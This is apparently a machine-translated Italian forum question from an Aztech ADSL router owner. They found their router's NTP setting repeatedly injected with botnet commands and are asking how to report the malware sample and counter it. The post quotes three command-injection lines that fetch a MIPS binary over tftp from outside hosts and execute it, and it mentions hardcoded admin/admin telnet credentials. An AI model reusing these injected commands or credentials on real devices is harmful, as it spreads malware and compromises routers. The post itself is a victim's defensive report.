Backstory
Pochi anni fa ho acquistato un router ADSL Aztech DSL5005 , era l'unico router disponibile che potevo verificare posso telnet e ottenere un ambiente Linux appropriato ( Volevo un OpenWRT abilitato Router ADSL, ma non ce l'ha fatta! ). Da allora, ho avuto una buona esperienza con esso; Sono stato in grado di compilare molte cose e farle lavorare su di esso, ovvero transmission-daemon
, wget
, httpd
, transocks
... È stato di grande aiuto in quanto ricevevo solo poche ore di energia elettrica ogni giorno , e aiuta a mantenere il router con un flashdrive collegato per ottenere tutto il caricamento / download di cui ho bisogno per il mio lavoro, dal momento che non posso tenere il mio laptop sempre in esecuzione.
Scoperta del problema
Due mesi fa, sono passato all'interfaccia web del router per giocare con alcune impostazioni della QoS ... Mentre giravo intorno alle impostazioni, ho trovato questo, come un "Server NTP personalizzato":
'cd /tmp;tftp -l4 -r4 -g 182.186.194.41 43630;chmod 777 4;./4'
Ho immediatamente disconnesso il cavo telefonico dal router, ho telnetato su di esso e ho controllato il file, non c'era! La prossima cosa che ho fatto è stata quella di eseguire il backup delle impostazioni (ti dà un file pseudo-xml con una gerarchia di impostazioni), e poi ha fatto un hard reset di fabbrica. Ho proceduto a ripristinare manualmente le impostazioni ADSL ...
Ho iniziato a riflettere su quale potrebbe essere la fonte dell'hack: mentre il router ha un utente "admin" per la sua interfaccia web la cui password può essere cambiata, telnet user / pass sono sempre admin / admin anche dopo aver cambiato l'interfaccia web controparte. Sono stato in grado di mitigare questo alterando il file di configurazione e caricandolo (poi ho scoperto che include anche altre due credenziali hardcoded per la sua interfaccia web, ho cambiato entrambi). Anche se l'interfaccia telnet è solo LAN e non è possibile accedervi dalla WAN, ho pensato che un cattivo malware su uno smartphone ospite connesso avrebbe potuto causare questo danno.
Ho provato a recuperare manualmente il file specificato per esaminarlo, ma non potevo (timeout / irraggiungibile) ... Ho lasciato le cose lì e ho pensato che fosse, ma dopo alcuni giorni ho controllato di nuovo e ho trovato questo:
'cd /tmp;tftp -l4 -r4 -g 84.249.67.148 48896;chmod 777 4;./4'
Anche in questo caso, il router ha ottenuto di nuovo questo messaggio, ho telnetato: nessun file, ho cercato di ottenere il file (eseguendo manualmente tftp -l4 -r4 -g ...
), ma non è riuscito a ottenerlo ... Ho provato per molto tempo per scoprire il colpevole, non potevo ... Quindi, dopo aver perso molto tempo, ho deciso di lasciarlo e pensare che potrebbe essere una vecchia minaccia che ha i suoi server master offline, quindi non può recuperare i suoi file, e lo farà nessun danno (non che io possa fare comunque qualcosa!)
Ma! Oggi : ancora! Ho trovato questo:
'cd /tmp;tftp -l4 -r4 -g 31.9.x.x 36227;chmod 777 4;./4'
Questa volta qualcosa era diverso: il blocco IP appartiene al mio paese e il file era lì! Quindi gli IP precedenti non erano di un server di controllo, ma piuttosto delle precedenti vittime, solo che questa volta una vittima era all'interno della mia rete nazionale e il file poteva essere recuperato. Ho riavviato il router, quindi ho telnetato su di esso e ho creato una directory al posto del file da recuperare (quindi non può essere sovrascritto), quindi ho recuperato il file manualmente e copiato su:
aularon@etabits-laptop:/tmp$ file 4
4: ELF 32-bit MSB executable, MIPS, MIPS-I version 1 (SYSV), statically linked, stripped
Il file è compilato per la mia architettura del router ...
Cosa dovrei fare in questo caso? Esiste un luogo in cui posso inviare detto file per l'analisi? Ai ricercatori di sicurezza che conoscono meglio di me.
Sono interessato a due cose:
- Fornire informazioni su questa "botnet",
- Sapendo come prendere contromisure, per ora sto creando la directory
/tmp/4
e questo è tutto ciò che potrei inventare.
Si prega di consiglio!
Modifica: Questa domanda non è un duplicato di Come faccio a gestire un server compromesso? ; Con un server compromesso si hanno molte opzioni e metodologie che non si applicano quando si lavora su un router ... Non riesco nemmeno ad aggiornare e tanto meno fare una nuova installazione, manca anche molti programmi, inoltre non riesco a catturare i pacchetti di rete da / alla WAN, come prima arrivano al router. (la risposta di @mootmoot sembra andare nella giusta direzione, lo sto verificando e tornerò)